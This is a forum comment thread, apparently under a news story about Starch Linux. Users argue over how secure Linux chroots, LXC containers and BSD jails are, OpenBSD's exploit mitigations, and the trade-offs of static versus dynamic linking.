Announcement

Collapse
No announcement yet.

Starch Linux: OpenBSD Atop Arch's Linux Kernel

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • #46
    Originally posted by kraftman View Post
    Because they're too smart to use Unix or Unix like OS while there's Linux.
    So there are to smart to use an Unix-like OS because of the existence of another Unix-like OS?
    Wow, your logic is so fucked up, it hurts.

    Comment


    • #47
      Oh, and another comment:
      FreeBSD != OpenBSD.


      From what I've seen, OpenBSD is much better than FreeBSD in terms of having clean, bugless code.

      Comment


      • #48
        Originally posted by kraftman View Post
        It's exactly opposite.
        I know for sure that there are various known ways to break out of a chroot - if you are root that is. Those are intentionally not fixed in Linux because security never was chroots' main purpose.

        If you blindly trust your Linux chroots youre gonna be burned.

        Even Linux chroot is more secure than bsd jails.
        I never claimed that bsd jails are more secure, because I don't know those.

        Not to mention containers.
        Linux containers (lxc) are not really safe either. There are several known ways to break out from lxcontainers. They are slowly working on fixing those, but again, the main purpose of LXC is not security.

        There's also many more options on Linux that are more secure.
        True. Grsecurity patch adds various (at least 13) chroot restrictions so that chroot acutallly can be used for security.

        There is also a "container" project that is known to do containers/jails safely: Linux Vserver.

        My point is that you should be really careful how you use chroots and LXC - if it safer than BSD or not I don't know - or care. There are many other good reasons to stick with Linux.

        Comment


        • #49
          Originally posted by kraftman View Post
          Don't make us laugh mentioning thing that are something common.
          Feel free to laugh. As I said, OpenBSD was early with those features. Linux only got it the latest few years. Also, NX bit support in Linux is a bit limited. OpenBSD implemented similar feature as NX for i386, early, even if the hardware does not support it. The other BSD didnt have those features.

          You can actually get those feature on Linux too, with PaX patches.

          I know those things because I was around when propolice patches entered gcc. (gcc-3.3 -> gcc-4). Both OpenBSD and Gentoo Hardened did lot of good work there.

          Comment


          • #50
            Originally posted by gens View Post
            ITS A PROJECT FOR A STATIC VERSION OF ARCH LINUX !!
            Static linking is generally a bad idea. You'll end up with multiple copies of same code in memory -> bloat. You'll probably end up using more memory than with glibc.

            Check out Alpine Linux. Uses uclibc and busybox and shared libs.

            Comment


            • #51
              Originally posted by ncopa View Post
              I never claimed that bsd jails are more secure, because I don't know those.
              As far as I know, there is no known way to break out of a BSD jail in the default configuration on FreeBSD. If you modify a FreeBSD jail to add certain devices in /dev from the host to the jail, enable UNIX System V shared memory or a few other things, then it becomes possible to break out.

              Comment


              • #52
                Originally posted by ryao View Post
                As far as I know, there is no known way to break out of a BSD jail in the default configuration on FreeBSD. If you modify a FreeBSD jail to add certain devices in /dev from the host to the jail, enable UNIX System V shared memory or a few other things, then it becomes possible to break out.
                That is what I expected. Even the wikipedia article says that one of the three goals for a jail is security while Linux developers claimes that chroot is not and never has been a security tool.

                I got a bit surprised to see someone claim that even Linux chroots are more secure than BSD jails. I guess someone on the internet is wrong...

                Comment


                • #53
                  Originally posted by ncopa View Post
                  That is what I expected. Even the wikipedia article says that one of the three goals for a jail is security while Linux developers claimes that chroot is not and never has been a security tool.

                  I got a bit surprised to see someone claim that even Linux chroots are more secure than BSD jails. I guess someone on the internet is wrong...
                  Both jails and chroots are available on FreeBSD. They are not mutually exclusive. chroot is not and never has been a security tool on FreeBSD either.

                  Comment


                  • #54
                    Originally posted by systemd anals bsd
                    Linux chroots are far more secure then BSD jails or chroots. BSD jails make the crappy OS even more vulnerable.
                    Any facts on this? Or just your "informed opinion"?

                    Comment


                    • #55
                      Originally posted by ncopa View Post
                      Static linking is generally a bad idea. You'll end up with multiple copies of same code in memory -> bloat. You'll probably end up using more memory than with glibc.

                      Check out Alpine Linux. Uses uclibc and busybox and shared libs.

                      There are strong and weak points with both static and dynamic linking. I do not even presume to know all the details, but a static binary does not have to be executed via the linker, so it is generally started faster (you might loose RAM but you win CPU...). Other strong points with static binaries is that they are portable (you do not have to package a bundle of dlls together with your binary) and will stay executeable on a specific architecture/kernel combination for a _very_ long time. An all-static OS like Plan9 is far from being bloated.

                      Another huge advantage is that the whole system does not break down if libc breaks.

                      For a standard desktop, static linking would probably be a bad thing. On the other hand, for small and true "unixy" applications, static linking against light-weight libraries makes a lot of sense.

                      Comment

                      Working...
                      X